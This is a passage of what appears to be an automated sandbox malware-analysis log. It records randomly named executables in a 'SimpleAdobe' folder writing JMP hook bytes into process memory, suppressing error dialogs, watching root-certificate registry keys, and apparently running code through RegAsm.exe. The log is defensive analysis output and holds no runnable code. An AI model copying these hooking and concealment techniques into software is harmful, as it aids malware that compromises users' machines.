Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 1CD0005 value: E9 2B BA 1F 75
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 76ECBA30 value: E9 DA 45 E0 8A
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 1CE0008 value: E9 8B 8E 23 75
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 76F18E90 value: E9 80 71 DC 8A
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 1D00005 value: E9 8B 4D EF 73
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 75BF4D90 value: E9 7A B2 10 8C
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 1D10005 value: E9 EB EB EF 73
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 75C0EBF0 value: E9 1A 14 10 8C
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 1D20005 value: E9 8B 8A 2B 73
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 74FD8A90 value: E9 7A 75 D4 8C
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 1D30005 value: E9 2B 02 2D 73
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 75000230 value: E9 DA FD D2 8C
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 810005 value: E9 8B 2F 6F 76
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 76F02F90 value: E9 7A D0 90 89
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 900005 value: E9 2B BA 5C 76
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 76ECBA30 value: E9 DA 45 A3 89
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 910008 value: E9 8B 8E 60 76
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 76F18E90 value: E9 80 71 9F 89
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 930005 value: E9 8B 4D 2C 75
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 75BF4D90 value: E9 7A B2 D3 8A
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 940005 value: E9 EB EB 2C 75
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 75C0EBF0 value: E9 1A 14 D3 8A
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 950005 value: E9 8B 8A 68 74
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 74FD8A90 value: E9 7A 75 97 8B
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 960005 value: E9 2B 02 6A 74
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Memory written: PID: 7720 base: 75000230 value: E9 DA FD 95 8B

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

12_2_00416240

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
